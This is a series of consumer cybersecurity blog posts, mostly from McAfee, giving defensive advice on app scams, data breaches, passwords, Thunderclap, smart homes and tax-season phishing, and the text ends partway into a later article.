While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace it with a bulletproof password to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent  Mobile Threat Report, you don’t know because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60-90 apps installed on their phones. Multiply that between all the users in your home, and you are looking at anywhere from 200-500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically, hidden apps (such as TimpDoor) get to users via Google Play when they download games or customized tools. TimpDoor will then directly communicate with users via a text with a link to a voice message that gives detailed instructions to enable apps from unknown sources. That link downloads malware which will run in the background after the app closes. Users often forget they’ve downloaded this and go on with life while the malware runs in the background and can access other internal networks on the smartphone.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year it is the 60 million+ downloaded game Fortnite. The Fortnite craze has lead hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, crypto jack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were stored in plaintext in an internal company database. This means that thousands of Facebook employees had access to the database and could have potentially searched through these user passwords. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is in the process of investigating long-term infrastructure changes to prevent these security issues going forward.

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Users: Here are Proactive Tips to Keep Your Data Safe appeared first on McAfee Blogs.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with a nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when you’re visiting these sites you’re not clicking on any conspicuous ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website from the company displaying the ad as opposed to clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

How to Safeguard Your Family Against A Medical Data Breach

Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

The IoT Factor

Medical Data Breach

Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

Medical Data Breach

Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices

Medical Data Breach

According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as  “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because it makes them harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep you software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of largescale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine. Thunderbolt ports are convenient for charging other devices using your laptop or desktop’s battery power. However, a new flaw called Thunderclap allows attackers to steal sensitive information such as passwords, encryption keys, financial information, or run detrimental code on the system if a malicious device is plugged into a machine’s port while it’s running.

So, how can attackers exploit this flaw? Thunderbolt accessories are granted direct-memory access (DMA), which is a method of transferring data from a computer’s random-access memory (RAM) to another part of the computer without it needing to pass through the central processing unit (CPU). DMA can save processing time and is a more efficient way to move data from the computer’s memory to other devices. However, attackers with physical access to the computer can take advantage of DMA by running arbitrary code on the device plugged into the Thunderbolt port. This allows criminals to steal sensitive data from the computer. Mind you, Thunderclap vulnerabilities also provide cybercriminals with direct and unlimited access to the machine’s memory, allowing for greater malicious activity.

Thunderclap-based attacks can be carried out with either specially built malicious peripheral devices or common devices such as projectors or chargers that have been altered to automatically attack the host they are connected to. What’s more, they can compromise a vulnerable computer in just a matter of seconds. Researchers who discovered this vulnerability informed manufacturers and fixes have been deployed, but it’s always good to take extra precautions. So, here are some ways users can defend themselves against these flaws:

  • Disable the Thunderbolt interface on your computer. To remove Thunderbolt accessibility on a Mac, go to the Network Preference panel, click “OK” on the New Interface Detected dialog, and select “Thunderbolt Bridge” from the sidebar. Click the [-] button to delete the option as a networking interface and choose “Apply.” PCs often allow users to disable Thunderbolt in BIOS or UEFI firmware settings, which connect a computer’s firmware to its operating system.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73%in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers— change the default username and password to something strong, and unique. Hackers often know the default settings and share them online.Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

Beware! Even Good Domains Also Carries Malicious URLs

According to an article on helpnetsecurity.com, it reads that nearly 40 percent of good domains carried malicious URLs. So now the question arises is legitimate websites compromised to host malicious content. Now the challenge for cybersecurity experts is to protect users with a solution that gives them URL-level visibility.

The vulnerable people are the home users, since they have very limited basic protection or not protection, compare to the business network. Helpnetsecurity says that 68 percent of the infections are detected on the consumer endpoints, versus 32 percent on business endpoints.

There is a rise in phishing attacks with the number of phishing sites growing 220 percent compared to last year. Interestingly, even phishing websites use SSL certificates and HTTPS to trick users into believing they are genuine. Financial institutions seem to be the favorite for the phishing developers, as they believe impersonating them makes people fall easily. The article read how over 80 percent of the phishing pages used HTTPS.

Webroot said: That organizations that combine phishing simulation campaigns with regular training saw a 70 percent drop in phishing link click-through.

Webroot further says “that a third of malware tries to install itself in %appdata% folders. Although malware can hide almost anywhere, Webroot found several common locations, including %appdata% (29.4 percent), %temp% (24.5 percent), and %cache% (17.5 percent), among others. These locations are prime for hiding malware because these paths are in every user directory with full user permissions to install there. These folders also are hidden by default on Windows Vista and up.”

Webroot says that there is a steady decline in malware on Windows 10 machines against Windows 7.

Hal Lonas, CTO, Webroot said: “We wax poetic about innovation in the cybersecurity field, but you only have to take one look at the stats in this year’s report to know that the true innovators are the cybercriminals. They continue to find new ways to combine attack methods or compromise new and existing vectors for maximum results. My call to businesses today is to be aware, assess your risk, create a layered approach that protects multiple threat vectors and, above all, train your users to be an asset—not a weak link—in your cybersecurity program.”

The post Beware! Even Good Domains Also Carries Malicious URLs appeared first on .

Top 3 Cybersecurity Measures: Skepticism, Awareness and Training

What will you think of when you hear the word information leak due to unauthorized access? Why data breach incidents does not decrease? One of the reasons is the sophistication of attacks. As a means of unauthorized access, an attacker tries to send malware by email to a targeted party, but at that time, it often becomes very convincing as the real thing, because of this, the targeted person opens the mail without any doubt, infects the device with malware and causes information leakage.

In this The Threat Report article, we will try to clear up people’s confusion about why data breach happens, written in plain English language of a common Joe and Jill.

Crisis Awareness

